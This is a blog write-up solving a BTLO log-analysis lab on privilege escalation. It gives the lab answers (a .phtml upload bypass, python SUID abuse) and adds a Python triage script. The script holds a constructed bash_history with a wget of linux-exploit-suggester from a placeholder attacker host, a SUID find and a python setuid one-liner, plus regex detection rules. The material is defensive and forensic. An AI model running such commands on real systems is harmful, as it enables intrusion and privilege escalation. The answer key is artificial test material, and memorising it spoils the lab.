Log Analysis - Privilege Escalation BTLO Lab Solving
Assalamu Alaikum Wa Rahmatullah. How are you, hackers? May Allah bless me and you.
Today I am writing this blog/article after solving Log Analysis — Privilege Escalation. I wrote it based on how I solved this lab.
Before reading this, try to solve the lab yourself. If you get stuck, come back here for help.
Ok, now let's move on to the lab.
First, read the scenario.
A server with sensitive data was accessed by an attacker and the files were posted on an underground forum. This data was only available to a privileged user, in this case the ‘root’ account. Responders say ‘www-data’ would be the logged in user if the server was remotely accessed, and this user doesn’t have access to the data. The developer stated that the server is hosting a PHP-based website and that proper filtering is in place to prevent php file uploads to gain malicious code execution. The bash history is provided to you but the recorded commands don’t appear to be related to the attack. Can you find what actually happened?
In the asset section they provide a zip file. I downloaded it, and inside the zip file I found two text files.
When I looked at the BTLO.txt file, there was nothing interesting.
But when I looked at the bash_history file, I found all the answers. To solve this lab we don't need any tools except a terminal.
Now let's solve the lab.
What user (other than ‘root’) is present on the server?
Answer :
daniel
Note : View the bash_history file and you will find the answer.
What script did the attacker try to download to the server?
Answer :
linux-exploit-suggester.sh
Note : View the bash_history file and you will find the answer.
What packet analyzer tool did the attacker try to use?
Answer :
tcpdump
Note : View the bash_history file and you will find the answer.
What file extension did the attacker use to bypass the file upload filter implemented by the developer?
Answer :
.phtml
Note : View the bash_history file and you will find the answer.
Based on the commands run by the attacker before removing the php shell, what misconfiguration was exploited in the ‘python’ binary to gain root-level access? 1- Reverse Shell ; 2- File Upload ; 3- File Write ; 4- SUID ; 5- Library load
Answer :
4
Note : Look at the image down below. If you know about Linux privilege escalation, you should be able to recognise that this is SUID abuse: the python binary had the SUID bit set, so running it let the attacker switch into the superuser (administrator) context.
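As an added example (not part of the original write-up or the lab files), here is a small Python triage script that scans a bash_history for the kinds of indicators the questions above ask about: a web shell saved with an alternative PHP extension, an enumeration script download, packet-capture use, SUID enumeration and abuse, and cleanup of the shell. The history lines are constructed for illustration and the attacker host is a placeholder.

```python
import re

# Constructed bash_history in the style of the lab (NOT the lab's real file).
# "ATTACKER-HOST-PLACEHOLDER" stands in for whatever host served the script.
SAMPLE_HISTORY = """\
ls -la /var/www/html/uploads
mv shell.php shell.phtml
wget http://ATTACKER-HOST-PLACEHOLDER/linux-exploit-suggester.sh
tcpdump -i eth0 -w capture.pcap
find / -perm -4000 -type f 2>/dev/null
python -c 'import os; os.setuid(0); ...'
rm /var/www/html/uploads/shell.phtml
"""

# Detection rules: (label, regex). First matching rule wins per line, so
# cleanup is listed before the extension rule (an rm of a .phtml file
# would otherwise be reported as a filter bypass).
RULES = [
    ("shell-cleanup", re.compile(r"\brm\b.*\.(phtml|phar|php\d?)\b", re.I)),
    # Non-standard PHP extensions commonly accepted when only ".php" is blocked.
    ("upload-filter-bypass", re.compile(r"\.(phtml|phar|php[3-7]|phps)\b", re.I)),
    ("enumeration-script", re.compile(r"linux-exploit-suggester|linpeas|linenum", re.I)),
    ("packet-capture", re.compile(r"\b(tcpdump|tshark)\b")),
    # Enumeration of SUID binaries (find ... -perm -4000 / -perm -u=s).
    ("suid-enumeration", re.compile(r"find .*-perm .*(4000|u=s)")),
    # A python invocation that changes its uid: only works if python is SUID.
    ("suid-abuse", re.compile(r"\bpython[23]?\b.*setuid")),
]


def analyze(history: str):
    """Return (line_number, label, command) for every history line that
    matches a rule, in the order the commands were recorded."""
    findings = []
    for lineno, cmd in enumerate(history.splitlines(), 1):
        for label, pattern in RULES:
            if pattern.search(cmd):
                findings.append((lineno, label, cmd.strip()))
                break
    return findings


def stages_seen(history: str):
    """Sorted set of attack stages observed in the history."""
    return sorted({label for _, label, _ in analyze(history)})


if __name__ == "__main__":
    for lineno, label, cmd in analyze(SAMPLE_HISTORY):
        print(f"line {lineno:>3}  {label:<22} {cmd}")
```

Run it against a real bash_history by reading the file into `analyze()`; the labels map directly onto the lab questions (extension used, script downloaded, packet analyzer, SUID misconfiguration).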
Congratulations! You have successfully solved the lab.
Thanks for reading. I hope this article/blog helps you. If you have any questions or doubts, feel free to ask. And please follow me on Medium; it's free and you can always change your mind.
Here are my social links :
Linkedin : https://www.linkedin.com/in/r3dw4n4hm3d/
GitHub : https://github.com/r3dw4n48m3d
Website : https://r3dw4n48m3d.github.io/Portfolio/
YouTube : https://www.youtube.com/@R3DW4NA8M3D